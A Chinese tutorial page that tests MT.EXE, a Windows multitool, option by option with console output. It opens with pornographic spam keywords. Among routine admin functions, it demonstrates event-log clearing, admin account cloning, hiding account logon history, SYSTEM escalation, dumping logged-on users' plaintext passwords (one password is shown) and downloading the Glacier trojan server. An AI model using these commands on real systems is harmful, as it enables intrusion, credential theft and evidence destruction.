欧美bbbwbbbw肥妇,免费乱码人妻系列日韩,一级黄片

MT.EXE 中文使用教程

  發(fā)布時間:2011-05-01 00:33:36   作者:佚名   我要評論
MT.EXE是一個網絡管理方面的軟件,依照yy3的說法,也就是 “七拼八湊來的,純粹是圖個方便?!笨墒沁@個方便個真的是太方便了,有了這40K的一個程序,可以刪除我們電腦里面多達幾M的程序,讓我們先來看看這個程序的真面目吧
mt.exe下載
D:\>mt.exe
Usage: mt.exe <Opintion>
Opintion :
 -filter          ---Change TCP/IP filter to on/off status.
 -addport         ---Add ports to the filter' allowed portlist.
 -setport         ---Set ports as the filter' allowed portlist.
 -nicinfo         ---List TCP/IP interface info.
 -pslist          ---List active processes.
 -pskill          ---Kill a specified process.
 -dlllist         ---List dlls of a specified process.
 -sysinfo         ---List system info.
 -shutdown         ---Shutdown system.
 -reboot          ---Reboot system.
 -poweroff         ---Turn off power.
 -logoff          ---Logoff current user's session.
 -chkts          ---Check Terminal Service info.
 -setupts         ---Install Terminal Service.
 -remts          ---Remove Terminal Service.
 -chgtsp          ---Reset Terminal Service port.
 -clog           ---Clean system log.
 -enumsrv         ---List all services.
 -querysrv         ---List detail info of a specified service.
 -instsrv         ---Install a service.
 -cfgsrv          ---Changes the configuration of a service.
 -remsrv          ---Remove a specified service.
 -startsrv         ---Start a specified service.
 -stopsrv         ---Stop a specified service.
 -netget          ---Download from http/ftp.
 -redirect         ---Port redirect.
 -chkuser         ---List all account、sid and anti clone.
 -clone          ---Clone from admin to dest.
 -never          ---Set account looks like never logged on.
 -killuser         ---Del account. Even "guest" account.
 -su            ---Run process as Local_System privilege.
 -findpass         ---Show all logged on user's pass.
 -netstat         ---List TCP connections.
 -killtcp         ---Kill TCP connection.
 -psport          ---Map ports to processes.
 -touch          ---Set the file times for a specified file.
 -secdel          ---Secure delete files and directory or zap free
pace.
 -regshell         ---Enter a console registry editor.
 -chkdll          ---Detect gina dll backdoor.
大家可以看見的是,.他的功能一共有34項,包含我們我們平時使用的大部分軟件.下面我就來一項一項的測試,條件和能力有限,希望大家能夠指出其中的不足.
一,MT.EXE –filter
Usage:
MT -filter <ON&line;OFF>  ----Enabld&line;Disable TCP/IP Filter.
從上面的說明可以知道,這個是打開關閉TCP/IP篩選的,我們先來試一下,輸入命令:
D:\>MT -FILTER on
Enable TCP/IP Filter successful!
這個時候我們看看試不試打開了TCP/IP篩選,打開網絡連接選項,右鍵本地連接---Internet協(xié)議(TCP/IP)屬性----高級---選項----TCP/IP篩選-----屬性,我們看到的這樣的情況,如圖:
可以看見,我們已經啟用了這個TCP/IP篩選,再次輸入命令:
D:\>MT -FILTER off
Disable TCP/IP Filter successful!
查看屬性:
有了這個工具,我們就不必那樣的麻煩的點擊鼠標了,一切都很簡單.
二, D:\>mt -addport
Usage:
mt -addport <TCP&line;UDP> NIC PortList  ----Add ports to the allowed portlist.
                     Use "-nicinfo" get Nic number first.
從說明上面看,是增加端口列表中允許通訊的端口,還是和上面的一樣,我們來看看這個功能是如何的強大:
五, -pslist          ---List active processes.
列出活動進程,經常用PSTOOLS的很熟悉這個功能了,在這里,我將這個工具和pstools的工具相比較,看看他們的功能怎么樣?
D:\>mt -pslist
PID   Path
0    [Idle Process]
4    l[System]
464   \SystemRoot\System32\smss.exe
524   \??\C:\WINDOWS\system32\csrss.exe
548   \??\C:\WINDOWS\system32\winlogon.exe
592   C:\WINDOWS\system32\services.exe
604   C:\WINDOWS\system32\lsass.exe
780   C:\WINDOWS\system32\svchost.exe
844   C:\WINDOWS\System32\svchost.exe
876   C:\Program Files\TGTSoft\StyleXP\StyleXPService.exe
932   C:\WINDOWS\System32\svchost.exe
960   C:\WINDOWS\System32\svchost.exe
1128  C:\WINDOWS\System32\alg.exe
1160  C:\WINDOWS\System32\inetsrv\inetinfo.exe
1188  D:\mysql\bin\mysqld-nt.exe
1280  C:\WINDOWS\System32\nvsvc32.exe
1728  C:\WINDOWS\Explorer.EXE
212   C:\WINDOWS\System32\ctfmon.exe
504   D:\Program Files\Microsoft Office\Office10\WINWORD.EXE
924   D:\Program Files\MYIE2\myie.exe
1348  C:\WINDOWS\System32\dllhost.exe
1516  C:\WINDOWS\System32\dllhost.exe
1856  C:\WINDOWS\System32\msdtc.exe
1356  C:\WINDOWS\System32\cmd.exe
1004  C:\WINDOWS\System32\conime.exe
1748  D:\Program Files\HyperSnap-DX 5\HprSnap5.exe
1272  D:\MT.exe
我們使用PSLIST得到的結果:
D:\hack>pslist
PsList v1.12 - Process Information Lister
Copyright (C) 1999-2000 Mark Russinovich
Systems Internals - http://www.sysinternals.com
Process information for LIN:
Name     Pid Pri Thd Hnd  Mem   User Time  Kernel Time  Elapsed Time
Idle      0  0  1  0   20  0:00:00.000  0:40:22.453  0:00:00.000
System     4  8 56 258   40  0:00:00.000  0:00:06.098  0:00:00.000
smss     464 11  3  21   44  0:00:00.010  0:00:00.100  0:43:10.565
csrss    524 13 11 416  3892  0:00:02.042  0:00:14.240  0:43:06.449
winlogon   548 13 19 443  1044  0:00:01.171  0:00:01.882  0:43:04.185
services   592  9 21 307  940  0:00:00.721  0:00:01.662  0:43:01.582
lsass    604  9 19 304  1132  0:00:00.540  0:00:00.690  0:43:01.532
svchost   780  8  8 255  824  0:00:00.200  0:00:00.160  0:42:58.687
svchost   844  8 55 1214  5740  0:00:02.393  0:00:01.932  0:42:58.457
StyleXPSer  876  8  2  38  416  0:00:00.110  0:00:00.070  0:42:58.357
svchost   932  8  5  46  396  0:00:00.020  0:00:00.040  0:42:56.705
svchost   960  8  7  90  204  0:00:00.060  0:00:00.040  0:42:56.244
alg     1128  8  5 116  220  0:00:00.020  0:00:00.060  0:42:49.144
inetinfo  1160  8 17 281  864  0:00:00.210  0:00:00.330  0:42:49.054
mysqld-nt  1188  8  6  81   76  0:00:00.010  0:00:00.050  0:42:47.602
nvsvc32   1280  8  3  74   92  0:00:00.090  0:00:00.160  0:42:45.378
Explorer  1728  8 20 583 19548  0:00:11.436  0:00:27.519  0:42:37.607
ctfmon    212  8  1 109  1596  0:00:00.340  0:00:01.031  0:42:26.982
WINWORD   504  8  5 394 43428  0:01:04.072  0:00:25.757  0:41:26.194
myie     924  8  9 312  3116  0:00:09.623  0:00:07.460  0:35:36.582
dllhost   1348  8 23 240  1540  0:00:01.982  0:00:00.460  0:35:24.414
dllhost   1516  8 15 200  784  0:00:00.190  0:00:00.230  0:35:22.912
msdtc    1856  8 18 149  372  0:00:00.080  0:00:00.090  0:35:18.896
cmd     1356  8  1  21  592  0:00:00.080  0:00:00.100  0:32:44.414
conime   1004  8  1  25  664  0:00:00.050  0:00:00.030  0:32:42.652
HprSnap5  1748  8  6 168  1648  0:00:01.932  0:00:03.414  0:18:38.798
cmd     1548  8  1  20  1392  0:00:00.020  0:00:00.010  0:00:28.020
pslist   1716  8  2  82  1672  0:00:00.030  0:00:00.050  0:00:00.400
使用PULIST得到的結果:
E:\HACK>pulist
Process      PID User
Idle       0
System      4
smss.exe     464 NT AUTHORITY\SYS
csrss.exe     524 NT AUTHORITY\SYS
winlogon.exe   548 NT AUTHORITY\SYS
services.exe   592 NT AUTHORITY\SYS
lsass.exe     604 NT AUTHORITY\SYS
svchost.exe    780 NT AUTHORITY\SYS
svchost.exe    844 NT AUTHORITY\SYS
StyleXPService.exe 876 NT AUTHORITY\SY
svchost.exe    932
svchost.exe    960
alg.exe      1128
inetinfo.exe   1160 NT AUTHORITY\SYS
mysqld-nt.exe   1188 NT AUTHORITY\SYS
nvsvc32.exe    1280 NT AUTHORITY\SYS
Explorer.EXE   1728 LIN\lin
ctfmon.exe    212 LIN\lin
WINWORD.EXE    504 LIN\lin
MyIE.exe     924 LIN\lin
dllhost.exe    1348
dllhost.exe    1516 NT AUTHORITY\SYS
msdtc.exe     1856
cmd.exe      1356 LIN\lin
conime.exe    1004 LIN\lin
HprSnap5.exe   1748 LIN\lin
cmd.exe      1548 LIN\lin
pulist.exe    1788 LIN\lin
從上面的情況可以知道,輸入MT還沒有PSLIST功能的強大,能夠列出Name,Pid,Pri,Thd Hnd,Mem,User Time,Kernel Time,Elapsed Time,但是較于PULIST,已經是很好的了,能夠列出進程名和運行路徑,已經能夠滿足我們平時的使用了.
六, D:\>mt -pskill
Usage:
mt -pskill <PID&line;ProcessName>
同樣也是PSTOOLS的工具之一了,我們使用MyIE.exe這個軟件作為測試,看看他們能不能殺死這個進程,首先是使用MT,通過上面的MT –PSLIST,我們知道MyIE.exe的PID值是924,于是輸入:
D:\>mt -pskill 924
Kill process sccuessful!
很快,MYIE就消失了,也就是被KILL了,再使用PSKILL.EXE,我們表示公平統(tǒng)一性,我們還是有PSLIST取得MYIE的PID值,重新打開MYIE,得到它的PID值為220,我們輸入:
D:\hack>pskill 220
PsKill v1.03 - local and remote process killer
Copyright (C) 2000 Mark Russinovich
http://www.sysinternals.com
Process 220 killed.
同樣也是很快被KILL,說明MT和PSKILL的功能是一樣的,使用MT也可以達到和PSKILL一樣的效果.
我們發(fā)現(xiàn)MT一個比較弱的功能的就是沒有和PSKILL一樣支持網絡功能,在PSKILL中可以通過pskill [\\RemoteComputer [-u Username]] <process Id or name>
  -u  Specifies optional user name for login to
     remote computer.
殺死遠程的計算機進程,當然,我們不可能指望MT也能有這樣強大的功能,畢竟我們用的僅僅才只有40K.
七, D:\>mt -dlllist
Usage:
mt -dlllist <PID&line;ProcessName>
列出進程中相關的DLL文件,于這個相關功能的軟件我沒有找到,不過我們使用Windows優(yōu)化大師,我們先來測試一下,這次我們選中的進程是StyleXPService.exe.還是使用MT –pslist得到其PID值876,輸入:
D:\>mt -dlllist 876
C:\Program Files\TGTSoft\StyleXP\StyleXPService.exe
C:\WINDOWS\System32\ntdll.dll
C:\WINDOWS\system32\kernel32.dll
C:\WINDOWS\system32\USER32.dll
C:\WINDOWS\system32\GDI32.dll
C:\WINDOWS\system32\ADVAPI32.dll
C:\WINDOWS\system32\RPCRT4.dll
C:\WINDOWS\system32\ole32.dll
C:\WINDOWS\system32\OLEAUT32.dll
C:\WINDOWS\system32\MSVCRT.DLL
C:\WINDOWS\system32\VERSION.dll
C:\WINDOWS\System32\SETUPAPI.dll
C:\WINDOWS\System32\NETAPI32.dll
C:\WINDOWS\System32\IMM32.DLL
C:\WINDOWS\System32\LPK.DLL
C:\WINDOWS\System32\USP10.dll
C:\WINDOWS\System32\UXTHEME.DLL
C:\WINDOWS\System32\rsaenh.dll
打開Windows優(yōu)化大師,看看它得到的相關DLL文件是什么?如圖:
使用MT得到的DLL相關文件和Windows優(yōu)化大師的是一摸一樣的,我們可以肯定使用MT絕對比使用Windows優(yōu)化大師方便快捷.
八, mt –sysinfo
列出系統(tǒng)信息,還是使用Windows優(yōu)化大師與之作比較,發(fā)現(xiàn)幾乎沒有任何的失誤,可見準確性特別強的,由于頁面的關系,數(shù)據(jù)不再展示. 這個功能和程序sysinfo.exe是一樣的.
九,  -shutdown         ---Shutdown system.
-reboot          ---Reboot system.
  -poweroff         ---Turn off power.
  -logoff          ---Logoff current user's session.
這4個命令就不說了,和系統(tǒng)工具shutdown不一樣的是,輸入之后沒有任何的提示,直接關機,我已經試過了,幸虧還記得保存.
十,  -chkts          ---Check Terminal Service info.
 -setupts         ---Install Terminal Service.
 -remts          ---Remove Terminal Service.
 -chgtsp          ---Reset Terminal Service port.
這4個命令是和Terminal相關的,由于沒有安裝服務器版本的系統(tǒng),所以沒有測試.
十一,  -clog           ---Clean system log.
用來清除記錄,我們輸入:
D:\>mt -clog
Usage:
mt -clog <app&line;sec&line;sys&line;all>   ---Clean Application&line;Security&line;System&line;All logs.
從上面的可以看出,我們可以清除 “應用程序” “安全性” “系統(tǒng)”3個日志,我隨便選擇一個,用MT刪除 “應用程序”日志,輸入:
D:\>mt -clog app
Clean EventLog : Application successful!
打開事件查看器,如圖,
可以看出日志已經被清空,不過MT并不能和小榕的Cleariislog相比,不能刪除指定IP的日志,這個可能是yy3并沒有考慮將這個工具用作那樣的用途.
十二,  -enumsrv         ---List all services.
列出所有的服務,這個測試可能你的不同,因為我已經刪除了很多的服務的了,為了精簡系統(tǒng)和提升速度,還是來看看,
D:\>mt -enumsrv
Usage:
mt -enumsrv <SRV&line;DRV>     ----List all Win32&line;Driver Service
D:\>mt -enumsrv srv
Num  ServiceName       DisplayName
0  Alerter         Alerter
1  ALG           Application Layer Gateway Service
2  AppMgmt         Application Management
3  aspnet_state      ASP.NET State Service
4  AudioSrv        Windows Audio
(省略以下大部分的內容)
D:\>mt -enumsrv drv
Num  ServiceName       DisplayName
0  Abiosdsk        Abiosdsk
1  abp480n5        abp480n5
2  ACPI          Microsoft ACPI Driver
3  ACPIEC         ACPIEC
4  adpu160m        adpu160m
5  aec           Microsoft Kernel Acoustic Echo Canceller
6  AFD           AFD 網絡支持環(huán)境
7  Aha154x         Aha154x
8  aic78u2         aic78u2
(省略以下大部分的內容)
實在是太多了,也不想說什么了,只有一個字----高.
十三,  D:\>mt -querysrv
Usage:
mt -querysrv <ServiceName>   ----Show detial info of a specifies service.
列出服務的詳細信息,我們查看系統(tǒng)進程Alerter的信息,輸入:
D:\>mt -querysrv Alerter
ServiceName:  Alerter
Status:    Stopped
ServiceType:  Win32 Share Service
Start type:  Demand Start
LogonID:    NT AUTHORITY\LocalService
FilePath :   C:\WINDOWS\System32\svchost.exe -k LocalService
DisplayName:  Alerter
Dependency:  LanmanWorkstation
Description:  通知所選用戶和計算機有關系統(tǒng)管理級警報。如果服務停止,使用管理警
報的程序將不會受到它們。如果此服務被禁用,任何直接依賴它的服務都將不能啟動。Start type:  Demand Start
LogonID:    NT AUTHORITY\LocalService
FilePath :   C:\WINDOWS\System32\alg.exe
DisplayName:  Application Layer Gateway Service
Dependency:
Description:  為 Internet 連接共享和 Internet 連接防火墻提供第三方協(xié)議插件的支

實在是很清楚了,當然我們也可以使用mmc查看服務的詳細信息,如圖:
再一次看見這個參數(shù)了,上次已經忘記的了.
十四,  -instsrv         ---Install a service.
 -cfgsrv          ---Changes the configuration of a service.
 -remsrv          ---Remove a specified service.
 -startsrv         ---Start a specified service.
 -stopsrv         ---Stop a specified service.
這寫命令四和服務相關的,放在一起測試了,服務程序選擇了冰河的服務端server.exe,我現(xiàn)在要作的是將這個工具作為服務安裝,然后改變配置,開始服務,停止服務等,輸入:
十五, D:\>mt -netget
Usage:
   mt -netget <url> <filename to saved>    ---Download from http/ftp.
這個工具很是實用,直到幾個月前,還在安全焦點的論壇上面看見有人需要這樣的工具,不過那個時候他們提供的是VBS文件,可惜我現(xiàn)在已經找不到那些代碼了,在DOS下下載軟件的東西,特別的方便.打建IIS服務器,把server.exe文件放置在根目錄下面,在DOS下面輸入
D:\>mt -netget http://192.168.0.1/server.exe f:\server.exe
Download File from http://192.168.0.1/server.exe to f:\server.exe.
Download completed   272992 bytes ......
Downloaded  266.6KB  at 266 dot 6KB/S in 0sec.
File <f:\server.exe> TotalByte : 266 KB.
將下載回來的server.exe文件保存在F盤server.exe文件.
十六, D:\>mt -redirect
Usage:
mt -redirect <TargetIP> <TargetPort> <ListenPort>  ----TCP port redirector.
這個功能和FPIPE是一樣的,實現(xiàn)端口轉換,我們這樣測試,將192.168.0.1主機的80端口轉化為81端口,這樣輸入:
D:\>mt -redirect 192.168.0.1 80 81

------Waiting Connection-----
然后另外開一個CMD,telnet到192.168.0.1的81端口,看到這樣的情況,第一個CMD顯示出了連接的信息,
D:\>mt -redirect 192.168.0.1 80 81

------Waiting Connection-----

Accept client==>192.168.0.1:3027
connect to 192.168.0.1 80 success!
Thread 1988 recv 2 bytes.
Thread 1988 send 2 bytes.
Thread 1988 recv 2 bytes.
Thread 1988 send 2 bytes.
Thread 316 recv 224 bytes.
Thread 316 send 224 bytes.
而第二個CMD也顯示出了我們需要得到的信息:
HTTP/1.1 400 Bad Request
Server: Microsoft-IIS/5.1
Date: Wed, 19 May 2004 13:28:53 GMT
Content-Type: text/html
Content-Length: 87
<html><head><title>Error</title></head><body>The parameter is incorrect. </body>
</html>
不過這個功能有一點不穩(wěn)定,也就是說,有時候可以,有時候又不可以,這次的成功也是重新啟動以后才出現(xiàn)的,相對于FPIPE,是方便了很多了,置于FPIPE.exe的用法,實在是讓我頭痛了幾天.
17, D:\>mt -clone
Usage:
mt -clone <SourUser> <DestUser>
克隆賬號,有點象小榕的cloneuser,測試一下,新建一個用戶yun,現(xiàn)在我要將管理員賬號lin克隆為賬號yun,輸入:
D:\hack>mt -clone lin yun
Fail to Open SAM Key, 操作成功完成。
D:\>mt -clone lin yun
Fail to Open SAM Key, 操作成功完成。
可能是不支持XP系統(tǒng),雖然提示說操作成功,可是事實上,使用yun登陸的時候,還是沒有成功,可能也是有其缺陷或者是我自己操作失敗吧.
18, D:\>mt -never
 -never          ---Set account looks like never logged on.
它可以設置使用戶看起來從來沒有登陸過,在我的系統(tǒng)里面有2個用戶,一個是管理員lin,另外一個是公用的帳戶316,現(xiàn)在我把316設置為從不登陸的狀態(tài).輸入
D:\>mt -never 316
Require System Privilege.提示沒有權限,于是
D:\>mt -su
打開新的CMD窗口,輸入
Microsoft Windows XP [版本 5.1.2600]
(C) 版權所有 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>d:
D:\>mt -never 316
Fail to Set F Value.
D:\>net user 316
用戶名         316
全名          316
注釋
用戶的注釋
國家(地區(qū))代碼     000 (系統(tǒng)默認值)
帳戶啟用        Yes
帳戶到期        從不
上次設置密碼      2004/5/19 下午 08:22
密碼到期        從不
密碼可更改       2004/5/19 下午 08:22
需要密碼        Yes
用戶可以更改密碼    Yes
允許的工作站      All
登錄腳本
用戶配置文件
主目錄
上次登錄        從不
可允許的登錄小時數(shù)   All
本地組成員       *Users
全局組成員       *None
命令成功完成。

D:\>
可以看出來已經修改成功了,雖然顯示的是Fail to Set F Value.,但還是成功了.這個功能和never.exe是一樣的,只是將特定的的帳戶上回登陸時間改為帳戶從來沒有登陸上過系統(tǒng).
成功條件:你要有l(wèi)ocal system權限
18,  -killuser         ---Del account. Even "guest" account.
刪除用戶,輸入D:\>mt -killuser ziqi
Kill User: ziqi Success!
這個功能有一點問題,輸入提示已經刪除了,可是然后事實上,這個用戶并沒有刪除,我們輸入
D:\>net user
\\LIN 的用戶帳戶
-------------------------------------------------------------------------------
316           Administrator      ASPNET
Guest          HelpAssistant      IUSR_IMAGE
IWAM_IMAGE        lin           SUPPORT_388945a0
ziqi
命令成功完成。
還是能夠看見ziqi的賬號,打開控制面板,用戶賬號,還是能看見這個用戶的身影:
但是如果我們以下面這種方式登陸,也就是先運行MT –su得到系統(tǒng)最高權限,在這個CMD下,我們就可以刪除賬號了,同時也可以刪除GUEST用戶,雖然我還沒有激活這個賬號,不知道是什么原因,因為我本身登陸的就已經是administrator組了.刪除GUEST的過程:
D:\>mt -killuser guest
Kill User: guest Success!
D:\>net user
\\ 的用戶帳戶
-------------------------------------------------------------------------------
316           Administrator      ASPNET
HelpAssistant      IUSR_IMAGE        IWAM_IMAGE
lin           SUPPORT_388945a0     yun
命令運行完畢,但發(fā)生一個或多個錯誤。
19,  -su            ---Run process as Local_System privilege.
以系統(tǒng)特權運行進程,在管理員登陸的情況下輸入MT –su,馬上彈出另外一CMD窗口,在這個窗口中,可以做任何我們想做的事情,這個也是系統(tǒng)的最高權限了.
20 -regshell         ---Enter a console registry editor.
以CMD的方式編輯注冊表,輸入在CMD下不是很方便,不過有時候也是很使用的,輸入:
D:\>mt -regshell
HKLM\>dir
<SubKey>   HARDWARE
<SubKey>   SAM
<SubKey>   SECURITY
<SubKey>   SOFTWARE
<SubKey>   SYSTEM
               Total: 5 SubKey, 0 Value.
HKLM\>quitreg
D:\>
和真實環(huán)境沒有什么區(qū)別.
21, -netstat         ---List TCP connections.
列出所有的TCP連接,我讓192.168.0.2打開IE,訪問192.168.0.1的主頁,然后輸入:
D:\>mt -netstat
Num LocalIP      Port  RemoteIP     PORT  Status
11  192.168.0.1    80   192.168.0.2    1050  Established
如果使用的是系統(tǒng)自帶的netstat,得到的結果是一樣的:
D:\>netstat
Active Connections
Proto Local Address     Foreign Address    State
TCP  LIN:http        192.168.0.2:1050    ESTABLISHED
只是使用MT能夠更直接,更容易理解,比如使用端口80代替使用協(xié)議HTTP.
22, D:\>mt -killtcp
Usage:
mt -killtcp <ConnectionNum>  ----Kill a specifies TCP connection.
和上面的搭配用,如果先KILL192.168.0.2對本機(192.168.0.1)的連接,可以輸入:
D:\>mt -killtcp 11
Waiting connection to be close now.
這個時候再輸入:
D:\>mt -netstat
Num LocalIP      Port  RemoteIP     PORT  Status
D:\>
已經看不到有它的連接了.
23,  -chkdll          ---Detect gina dll backdoor.
檢查gina木馬后門,這個問題以前是很流行了,所以也被考慮進來了,使用很簡單:
D:\>mt -chkdll
GinaDll not found.
Winlogon Notification Package Dll:
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\crypt32chain
crypt32.dll
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\cryptnet
cryptnet.dll
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\cscdll
cscdll.dll
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\ScCertProp
wlnotify.dll
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\Schedule
wlnotify.dll
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\sclgntfy
sclgntfy.dll
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\SensLogn
WlNotify.dll
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\termsrv
wlnotify.dll
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\wlballoon
wlnotify.dll
Please make sure if they were backdoors.
如果我安裝了GINA木馬,會出現(xiàn)這樣的情況:
D:\>mt -chkdll
GinaDll exist:
   HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GinaDll
c:\windows\system32\ntshellgina.dll
很快就被檢測出來了,實在是很方便,呵呵,其實我那個DLL文件早就被KILL了,只是修改了一下注冊表而已,不過也顯示了這個工具的強大性.
24,  -psport          ---Map ports to processes.
顯示進程的端口,這個功能和哪個工具的功能一樣的呢,呵呵,忘記了,對了是FPORT.EXE,呵呵,很久沒有用了,還是來看看他們有什么不同的地方:
D:\>mt -psport
Proto  Listen        PID   Path
TCP   0.0.0.0:80      1160  C:\WINDOWS\System32\inetsrv\inetinfo.exe
TCP   0.0.0.0:135      780   C:\WINDOWS\system32\svchost.exe
TCP   0.0.0.0:443      1160  C:\WINDOWS\System32\inetsrv\inetinfo.exe
TCP   0.0.0.0:1025     1160  C:\WINDOWS\System32\inetsrv\inetinfo.exe
TCP   0.0.0.0:1026     4    [System]
TCP   0.0.0.0:3025     960   C:\WINDOWS\System32\svchost.exe
TCP   0.0.0.0:3027     1252  C:\WINDOWS\System32\msdtc.exe
TCP   0.0.0.0:3306     1176  D:\mysql\bin\mysqld-nt.exe
TCP   127.0.0.1:3001    1120  C:\WINDOWS\System32\alg.exe
TCP   127.0.0.1:3002    844   C:\WINDOWS\System32\svchost.exe
TCP   127.0.0.1:3003    844   C:\WINDOWS\System32\svchost.exe
TCP   192.168.0.1:139    4    [System]
TCP   192.168.0.1:3011   4    [System]
UDP   0.0.0.0:500      1160  C:\WINDOWS\System32\inetsrv\inetinfo.exe
UDP   0.0.0.0:3456     780   C:\WINDOWS\system32\svchost.exe
UDP   127.0.0.1:3020    1160  C:\WINDOWS\System32\inetsrv\inetinfo.exe
UDP   127.0.0.1:3026    1160  C:\WINDOWS\System32\inetsrv\inetinfo.exe
UDP   192.168.0.1:137    4    [System]
UDP   192.168.0.1:138    960   C:\WINDOWS\System32\svchost.exe
使用FPORT.EXE得到下面的結果
E:\HACK>fport /ap
FPort v2.0 - TCP/IP Process to Port Mapper
Copyright 2000 by Foundstone, Inc.
http://www.foundstone.com
Pid  Process      Port Proto Path
1120         -> 3001 TCP
960         -> 3025 TCP
1252         -> 3027 TCP
4   System     -> 1026 TCP
4   System     -> 139  TCP
4   System     -> 3011 TCP
1160 inetinfo    -> 1025 TCP  C:\WINDOWS\System32\inetsrv\inetinfo.exe
1160 inetinfo    -> 443  TCP  C:\WINDOWS\System32\inetsrv\inetinfo.exe
1160 inetinfo    -> 80  TCP  C:\WINDOWS\System32\inetsrv\inetinfo.exe
844  svchost    -> 3002 TCP  C:\WINDOWS\System32\svchost.exe
844  svchost    -> 3003 TCP  C:\WINDOWS\System32\svchost.exe
780  svchost    -> 135  TCP  C:\WINDOWS\system32\svchost.exe
1176 mysqld-nt   -> 3306 TCP  D:\mysql\bin\mysqld-nt.exe
960         -> 138  UDP
4   System     -> 137  UDP
1160 inetinfo    -> 3020 UDP  C:\WINDOWS\System32\inetsrv\inetinfo.exe
1160 inetinfo    -> 3026 UDP  C:\WINDOWS\System32\inetsrv\inetinfo.exe
1160 inetinfo    -> 500  UDP  C:\WINDOWS\System32\inetsrv\inetinfo.exe
780  svchost    -> 3456 UDP  C:\WINDOWS\system32\svchost.exe
基本上差不多了,不過感覺好像FPORT更加強大一點,因為我現(xiàn)在在FPORT中用了參數(shù),為了使2個更容易對比一些.
這里還有一個比較好的軟件,使GUI的,抓圖下來如下:
24,  -touch          ---Set the file times for a specified file.
查看文件修改時間,下載或者COPY,轉移會改變文件的最后修改時間,而使用這個命令可以查看文件的最后修改時間,舉個例子,我們現(xiàn)在看到的文件mt.exe,如圖,
而事實上,我們使用下面的命令:
D:\>mt -touch mt1.exe
Set FileTime Successful.
CreationTime  : 07/10/2002
LastAccessTime : 19/05/2004
LastWriteTime : 07/10/2002
可以知道其創(chuàng)建時間不使2004年5月19日,而是CreationTime  : 07/10/2002,相信這個也就使yy3寫這個程序的時間了.與這個相關的軟件有偷touch.exe,可以我電腦里面的這個文件已經本病毒破壞了。
25,  -chkuser         ---List all account、sid and anti clone.
這個功能,測試不了,雖然說使列出所有的用戶,SID和反克隆設置,但是,一旦輸入,就有錯誤發(fā)生
26,  -findpass         ---Show all logged on user's pass.
得到所有登陸用戶的密碼,由于這個命令是For NT/2K only.,所以我在客戶機上面測試這個功能,輸入,很容易就得到了密碼:
G:\WINNT\system32>mt -findpass
mt -findpass
The logon information :
   Domain  : 316-2AS8L1B1FL5
   Username : Administrator
   Password : winyaj
G:\WINNT\system32>
這個比findpass.exe還方便一些,不需要知道用戶進程的PID值.
后記:MT確實是一個很不錯的工具,它能夠讓我們很容易的做很多事情,而不用到處去找相關的軟件,
很多朋友都問在哪里可以下載?事實上現(xiàn)在在網絡上面是找不到這個程序的,因為這個程序是yy3給我測試的,沒經過他的同意,我也不敢隨便發(fā)布在網絡上面。所以想要的朋友麻煩留下你們的E-mail信箱,我會給沒一個朋友發(fā)一份,同時也希望能幫忙測試,發(fā)現(xiàn)一些BUG什么的。還有就是不要隨便亂發(fā)就是了,自己用真的很不錯的,到時候yy3怪下來我真的恐怕承受不起。

相關文章

最新評論